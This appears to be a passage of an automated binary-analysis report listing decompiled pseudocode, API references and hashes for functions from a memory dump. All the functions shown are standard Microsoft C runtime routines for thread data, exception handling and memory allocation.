                                                                                                            0x00a37860
                                                                                                            0x00a37865
                                                                                                            0x00000000
                                                                                                            0x00a37867
                                                                                                            0x00a37867
                                                                                                            0x00a3786c
                                                                                                            0x00a37898
                                                                                                            0x00a37898
                                                                                                            0x00a3789b
                                                                                                            0x00a3786e
                                                                                                            0x00a37873
                                                                                                            0x00a33925
                                                                                                            0x00a33927
                                                                                                            0x00a3392c
                                                                                                            0x00a33936
                                                                                                            0x00a3393b
                                                                                                            0x00a3393d
                                                                                                            0x00a33941
                                                                                                            0x00a3394c
                                                                                                            0x00a3394c
                                                                                                            0x00a3395d
                                                                                                            0x00a3395d
                                                                                                            0x00a3786c
                                                                                                            0x00a37865

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00A3786E
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A3787F
                                                                                                            • __getptd.LIBCMT ref: 00A3788D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: MOC$RCC$csm
                                                                                                            • API String ID: 803148776-2671469338
                                                                                                            • Opcode ID: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                                                                            • Instruction ID: b0de9f32178387dca43d910d3e40f9972ebae82e56ea98171fdbebe0a040aa0f
                                                                                                            • Opcode Fuzzy Hash: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                                                                            • Instruction Fuzzy Hash: C8E012765181489FDB309B69C24E7AC32A4EB95318F5545A1F41DCB232C725D990D542
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A37AFF, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E00A37AFF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0xa3ba68);
				E00A34440(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00A376B7(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00A33F5E(__ecx, _t53, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00A33F5E(_t48, _t53, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00A33F5E(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00A33F5E(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00A3775C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00A37C25(_t48, _t53, _t55, _t57, _t61);
				return E00A34485( *((intOrPtr*)(_t58 - 0x1c)));
			}








                                                                                                            0x00a37aff
                                                                                                            0x00a37aff
                                                                                                            0x00a37b01
                                                                                                            0x00a37b06
                                                                                                            0x00a37b0b
                                                                                                            0x00a37b0d
                                                                                                            0x00a37b10
                                                                                                            0x00a37b13
                                                                                                            0x00a37b16
                                                                                                            0x00a37b1d
                                                                                                            0x00a37b2e
                                                                                                            0x00a37b3c
                                                                                                            0x00a37b4a
                                                                                                            0x00a37b52
                                                                                                            0x00a37b60
                                                                                                            0x00a37b66
                                                                                                            0x00a37b6d
                                                                                                            0x00a37b70
                                                                                                            0x00a37b86
                                                                                                            0x00a37b89
                                                                                                            0x00a37bfe
                                                                                                            0x00a37c05
                                                                                                            0x00a37c0c
                                                                                                            0x00a37c19

                                                                                                            APIs
                                                                                                            • __CreateFrameInfo.LIBCMT ref: 00A37B27
                                                                                                              • Part of subcall function 00A376B7: __getptd.LIBCMT ref: 00A376C5
                                                                                                              • Part of subcall function 00A376B7: __getptd.LIBCMT ref: 00A376D3
                                                                                                            • __getptd.LIBCMT ref: 00A37B31
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A37B3F
                                                                                                            • __getptd.LIBCMT ref: 00A37B4D
                                                                                                            • __getptd.LIBCMT ref: 00A37B58
                                                                                                            • _CallCatchBlock2.LIBCMT ref: 00A37B7E
                                                                                                              • Part of subcall function 00A3775C: __CallSettingFrame@12.LIBCMT ref: 00A377A8
                                                                                                              • Part of subcall function 00A37C25: __getptd.LIBCMT ref: 00A37C34
                                                                                                              • Part of subcall function 00A37C25: __getptd.LIBCMT ref: 00A37C42
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 1602911419-0
                                                                                                            • Opcode ID: 3830e614d59b6e2674472a543bd7a4f0ec336fecf3281ec53f9c554f632463ce
                                                                                                            • Instruction ID: 813888431e98786929e09e74d3f0a1a0b419cf1c8cce8971ea4ea58aea3dd8c6
                                                                                                            • Opcode Fuzzy Hash: 3830e614d59b6e2674472a543bd7a4f0ec336fecf3281ec53f9c554f632463ce
                                                                                                            • Instruction Fuzzy Hash: 4911C9B1C052099FDF10EFA4D646BED77B0FF08314F108469F818AB251DB399A159B54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A35D96, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00A35D96(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xa3b768);
				E00A34440(__ebx, __edi, __esi);
				_t31 = E00A33F5E(__ebx, __edx, __edi, _t35);
				_t15 =  *0xa3db20; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00A338F2(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xa3da18; // 0x2531600
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xa3d5f0;
								if(__eflags != 0) {
									E00A3352B(_t33);
								}
							}
						}
						_t21 =  *0xa3da18; // 0x2531600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xa3da18; // 0x2531600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00A35E31();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00A32EDA(_t29, _t31, _t33, _t38);
				}
				return E00A34485(_t33);
			}









                                                                                                            0x00a35d96
                                                                                                            0x00a35d96
                                                                                                            0x00a35d96
                                                                                                            0x00a35d96
                                                                                                            0x00a35d98
                                                                                                            0x00a35d9d
                                                                                                            0x00a35da7
                                                                                                            0x00a35da9
                                                                                                            0x00a35db1
                                                                                                            0x00a35dd2
                                                                                                            0x00a35dd8
                                                                                                            0x00a35ddc
                                                                                                            0x00a35ddf
                                                                                                            0x00a35de2
                                                                                                            0x00a35de8
                                                                                                            0x00a35dea
                                                                                                            0x00a35dec
                                                                                                            0x00a35df5
                                                                                                            0x00a35df7
                                                                                                            0x00a35df9
                                                                                                            0x00a35dff
                                                                                                            0x00a35e02
                                                                                                            0x00a35e07
                                                                                                            0x00a35dff
                                                                                                            0x00a35df7
                                                                                                            0x00a35e08
                                                                                                            0x00a35e0d
                                                                                                            0x00a35e10
                                                                                                            0x00a35e16
                                                                                                            0x00a35e1a
                                                                                                            0x00a35e1a
                                                                                                            0x00a35e20
                                                                                                            0x00a35e27
                                                                                                            0x00a35db9
                                                                                                            0x00a35db9
                                                                                                            0x00a35db9
                                                                                                            0x00a35dbc
                                                                                                            0x00a35dbe
                                                                                                            0x00a35dc0
                                                                                                            0x00a35dc2
                                                                                                            0x00a35dc7
                                                                                                            0x00a35dcf

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00A35DA2
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __amsg_exit.LIBCMT ref: 00A35DC2
                                                                                                            • __lock.LIBCMT ref: 00A35DD2
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00A35DEF
                                                                                                            • _free.LIBCMT ref: 00A35E02
                                                                                                            • InterlockedIncrement.KERNEL32(02531600), ref: 00A35E1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3470314060-0
                                                                                                            • Opcode ID: a7c04c2bee6d49618e3e485d13741eba4e3204ed292af660c6423cf9b941ce8f
                                                                                                            • Instruction ID: 6404d0c269152a86c12c9f06637e68883077c2692b1c34467acb0f664d8b3956
                                                                                                            • Opcode Fuzzy Hash: a7c04c2bee6d49618e3e485d13741eba4e3204ed292af660c6423cf9b941ce8f
                                                                                                            • Instruction Fuzzy Hash: B0019232D05B11EBDB10EF7DAA0675EB7A0BF04751F254019F400A7290C734AA42CBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A37EAC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 28%
                                                                                                            			E00A37EAC(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00A37E1A(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00A37411(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00A3789C(_t22, _t23, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E00A37AFF(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00A373D8(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                                            0x00a37eac
                                                                                                            0x00a37eac
                                                                                                            0x00a37eac
                                                                                                            0x00a37eac
                                                                                                            0x00a37eb1
                                                                                                            0x00a37eb5
                                                                                                            0x00a37eb7
                                                                                                            0x00a37eba
                                                                                                            0x00a37ebb
                                                                                                            0x00a37ebc
                                                                                                            0x00a37ebf
                                                                                                            0x00a37ec4
                                                                                                            0x00a37ec4
                                                                                                            0x00a37ec7
                                                                                                            0x00a37ecb
                                                                                                            0x00a37ece
                                                                                                            0x00a37ed3
                                                                                                            0x00a37ed0
                                                                                                            0x00a37ed0
                                                                                                            0x00a37ed0
                                                                                                            0x00a37ed6
                                                                                                            0x00a37edb
                                                                                                            0x00a37edd
                                                                                                            0x00a37ee0
                                                                                                            0x00a37ee3
                                                                                                            0x00a37ee4
                                                                                                            0x00a37eec
                                                                                                            0x00a37ef1
                                                                                                            0x00a37ef5
                                                                                                            0x00a37ef8
                                                                                                            0x00a37efb
                                                                                                            0x00a37efe
                                                                                                            0x00a37f01
                                                                                                            0x00a37f02
                                                                                                            0x00a37f05
                                                                                                            0x00a37f0f
                                                                                                            0x00a37f13
                                                                                                            0x00000000
                                                                                                            0x00a37f13
                                                                                                            0x00a37f19

                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBCMT ref: 00A37EBF
                                                                                                              • Part of subcall function 00A37E1A: ___BuildCatchObjectHelper.LIBCMT ref: 00A37E50
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00A37ED6
                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 00A37EE4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                            • String ID: csm$csm
                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                            • Instruction ID: b3af6bb7ed97af017687b0238a92cc8cbf5e049b1f9e2b37622711546a074322
                                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                            • Instruction Fuzzy Hash: 3701E4B1405209BBDF22AF51CD45EAF7F6AEF08390F104454FD1815161D776A9B1EBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A32EF8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 52%
                                                                                                            			E00A32EF8(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				char* _v8;
				intOrPtr _v12;
				char _v20;
				intOrPtr _v28;
				void* _t20;
				signed int _t21;
				intOrPtr _t25;
				signed int _t27;
				void* _t33;
				void* _t34;
				void* _t35;
				signed int _t36;
				void* _t40;
				intOrPtr _t41;
				void* _t43;
				char* _t46;
				void* _t54;
				void* _t55;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr* _t64;
				intOrPtr* _t65;
				void* _t68;

				_t62 = __esi;
				_t55 = __edi;
				while(1) {
					_t20 = E00A33403(_t54, _t55, _t62, _a4);
					if(_t20 != 0) {
						break;
					}
					_t21 = E00A33D86(_t20, _a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0xa3dcc0 & 0x00000001;
						if(( *0xa3dcc0 & 0x00000001) == 0) {
							 *0xa3dcc0 =  *0xa3dcc0 | 0x00000001;
							__eflags =  *0xa3dcc0;
							_push(1);
							_v8 = "bad allocation";
							E00A32710(0xa3dcb4,  &_v8);
							 *0xa3dcb4 = 0xa391f4;
							E00A3309B( *0xa3dcc0, 0xa3882e);
						}
						_t46 =  &_v20;
						E00A32826(_t46, 0xa3dcb4);
						_v20 = 0xa391f4;
						E00A33252( &_v20, 0xa3b7e8);
						asm("int3");
						_t64 = __imp__DecodePointer;
						_t25 =  *_t64( *0xa3ea74, 0xa3dcb4, 0xa391f4, _t40, _t46, _t68);
						_t41 = _t25;
						_v28 = _t41;
						_t65 =  *_t64( *0xa3ea70);
						__eflags = _t65 - _t41;
						if(_t65 < _t41) {
							L18:
							_t27 = 0;
							__eflags = 0;
						} else {
							_t59 = _t65 - _t41;
							_t11 = _t59 + 4; // 0x4
							__eflags = _t11 - 4;
							if(_t11 < 4) {
								goto L18;
							} else {
								_t43 = E00A3491C(_t41);
								_t12 = _t59 + 4; // 0x4
								__eflags = _t43 - _t12;
								if(_t43 >= _t12) {
									L17:
									_t60 = __imp__EncodePointer;
									 *_t65 =  *_t60(_v0);
									 *0xa3ea70 =  *_t60(_t65 + 4);
									_t27 = _v0;
								} else {
									_t33 = 0x800;
									__eflags = _t43 - 0x800;
									if(_t43 < 0x800) {
										_t33 = _t43;
									}
									_t34 = _t33 + _t43;
									__eflags = _t34 - _t43;
									if(_t34 < _t43) {
										L14:
										_t14 = _t43 + 0x10; // 0x10
										_t35 = _t14;
										__eflags = _t35 - _t43;
										if(_t35 < _t43) {
											goto L18;
										} else {
											_t36 = E00A348CE(_v12, _t35);
											__eflags = _t36;
											if(_t36 == 0) {
												goto L18;
											} else {
												goto L16;
											}
										}
									} else {
										_t36 = E00A348CE(_v12, _t34);
										__eflags = _t36;
										if(_t36 != 0) {
											L16:
											_t65 = _t36 + (_t59 >> 2) * 4;
											__imp__EncodePointer(_t36);
											 *0xa3ea74 = _t36;
											goto L17;
										} else {
											goto L14;
										}
									}
								}
							}
						}
						return _t27;
					} else {
						continue;
					}
					L20:
				}
				return _t20;
				goto L20;
			}




























                                                                                                            0x00a32ef8
                                                                                                            0x00a32ef8
                                                                                                            0x00a32f0f
                                                                                                            0x00a32f12
                                                                                                            0x00a32f1a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a32f05
                                                                                                            0x00a32f0b
                                                                                                            0x00a32f0d
                                                                                                            0x00a32f1e
                                                                                                            0x00a32f2f
                                                                                                            0x00a32f31
                                                                                                            0x00a32f31
                                                                                                            0x00a32f38
                                                                                                            0x00a32f40
                                                                                                            0x00a32f47
                                                                                                            0x00a32f51
                                                                                                            0x00a32f57
                                                                                                            0x00a32f5c
                                                                                                            0x00a32f5e
                                                                                                            0x00a32f61
                                                                                                            0x00a32f6f
                                                                                                            0x00a32f72
                                                                                                            0x00a32f77
                                                                                                            0x00a32f80
                                                                                                            0x00a32f8d
                                                                                                            0x00a32f95
                                                                                                            0x00a32f97
                                                                                                            0x00a32f9c
                                                                                                            0x00a32f9e
                                                                                                            0x00a32fa0
                                                                                                            0x00a33027
                                                                                                            0x00a33027
                                                                                                            0x00a33027
                                                                                                            0x00a32fa6
                                                                                                            0x00a32fa8
                                                                                                            0x00a32faa
                                                                                                            0x00a32fad
                                                                                                            0x00a32fb0
                                                                                                            0x00000000
                                                                                                            0x00a32fb2
                                                                                                            0x00a32fb8
                                                                                                            0x00a32fba
                                                                                                            0x00a32fbe
                                                                                                            0x00a32fc0
                                                                                                            0x00a3300a
                                                                                                            0x00a3300d
                                                                                                            0x00a33015
                                                                                                            0x00a3301d
                                                                                                            0x00a33022
                                                                                                            0x00a32fc2
                                                                                                            0x00a32fc2
                                                                                                            0x00a32fc7
                                                                                                            0x00a32fc9
                                                                                                            0x00a32fcb
                                                                                                            0x00a32fcb
                                                                                                            0x00a32fcd
                                                                                                            0x00a32fcf
                                                                                                            0x00a32fd1
                                                                                                            0x00a32fe2
                                                                                                            0x00a32fe2
                                                                                                            0x00a32fe2
                                                                                                            0x00a32fe5
                                                                                                            0x00a32fe7
                                                                                                            0x00000000
                                                                                                            0x00a32fe9
                                                                                                            0x00a32fed
                                                                                                            0x00a32ff4
                                                                                                            0x00a32ff6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a32ff6
                                                                                                            0x00a32fd3
                                                                                                            0x00a32fd7
                                                                                                            0x00a32fde
                                                                                                            0x00a32fe0
                                                                                                            0x00a32ff8
                                                                                                            0x00a32ffc
                                                                                                            0x00a32fff
                                                                                                            0x00a33005
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a32fe0
                                                                                                            0x00a32fd1
                                                                                                            0x00a32fc0
                                                                                                            0x00a32fb0
                                                                                                            0x00a3302d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a32f0d
                                                                                                            0x00a32f1d
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 00A32F12
                                                                                                              • Part of subcall function 00A33403: __FF_MSGBANNER.LIBCMT ref: 00A3341C
                                                                                                              • Part of subcall function 00A33403: __NMSG_WRITE.LIBCMT ref: 00A33423
                                                                                                              • Part of subcall function 00A33403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00A3484E,00000000,00000001,00000000,?,00A3387D,00000018,00A3B658,0000000C,00A3390D), ref: 00A33448
                                                                                                            • std::exception::exception.LIBCMT ref: 00A32F47
                                                                                                            • std::exception::exception.LIBCMT ref: 00A32F61
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00A32F72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                            • String ID: bad allocation
                                                                                                            • API String ID: 615853336-2104205924
                                                                                                            • Opcode ID: c548c0c97bb9554e6e45010b8d5019bad3f15abb6232a6340e412aa9665001b7
                                                                                                            • Instruction ID: 29c6a18772b07018597f7f72a5b3f787b360341dbcbd53f46b6a85c5935fe066
                                                                                                            • Opcode Fuzzy Hash: c548c0c97bb9554e6e45010b8d5019bad3f15abb6232a6340e412aa9665001b7
                                                                                                            • Instruction Fuzzy Hash: FDF0AF32908209AACF14EBA4ED06A9EBAB9BF41714F100529F501A6192DFB09B12D790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A3664D, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E00A3664D(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0xa3e8c0, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0xa3e8c4 - _t7;
								if(__eflags == 0) {
									_t9 = E00A34264(__eflags);
									 *_t9 = E00A34222(GetLastError());
									goto L17;
								} else {
									__eflags = E00A33D86(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00A34264(__eflags);
										 *_t12 = E00A34222(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00A33D86(_t6, _t30);
						 *((intOrPtr*)(E00A34264(__eflags))) = 0xc;
						goto L12;
					} else {
						E00A3352B(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00A33403(__edx, __edi, __esi, _a8);
				}
			}









                                                                                                            0x00a36656
                                                                                                            0x00a36663
                                                                                                            0x00a36664
                                                                                                            0x00a36667
                                                                                                            0x00a36669
                                                                                                            0x00a36678
                                                                                                            0x00a366ab
                                                                                                            0x00a366ab
                                                                                                            0x00a366ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a3667b
                                                                                                            0x00a3667d
                                                                                                            0x00a3667f
                                                                                                            0x00a3667f
                                                                                                            0x00a3667f
                                                                                                            0x00a3668c
                                                                                                            0x00a36692
                                                                                                            0x00a36694
                                                                                                            0x00a36696
                                                                                                            0x00a366f6
                                                                                                            0x00a366f6
                                                                                                            0x00a36698
                                                                                                            0x00a36698
                                                                                                            0x00a3669e
                                                                                                            0x00a366e0
                                                                                                            0x00a366f4
                                                                                                            0x00000000
                                                                                                            0x00a366a0
                                                                                                            0x00a366a7
                                                                                                            0x00a366a9
                                                                                                            0x00a366c8
                                                                                                            0x00a366dc
                                                                                                            0x00a366c2
                                                                                                            0x00a366c2
                                                                                                            0x00a366c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a366a9
                                                                                                            0x00a3669e
                                                                                                            0x00000000
                                                                                                            0x00a366c4
                                                                                                            0x00a366b1
                                                                                                            0x00a366bc
                                                                                                            0x00000000
                                                                                                            0x00a3666b
                                                                                                            0x00a3666e
                                                                                                            0x00a36674
                                                                                                            0x00a36674
                                                                                                            0x00a366c5
                                                                                                            0x00a366c7
                                                                                                            0x00a36658
                                                                                                            0x00a36662
                                                                                                            0x00a36662

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 00A3665B
                                                                                                              • Part of subcall function 00A33403: __FF_MSGBANNER.LIBCMT ref: 00A3341C
                                                                                                              • Part of subcall function 00A33403: __NMSG_WRITE.LIBCMT ref: 00A33423
                                                                                                              • Part of subcall function 00A33403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00A3484E,00000000,00000001,00000000,?,00A3387D,00000018,00A3B658,0000000C,00A3390D), ref: 00A33448
                                                                                                            • _free.LIBCMT ref: 00A3666E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free_malloc
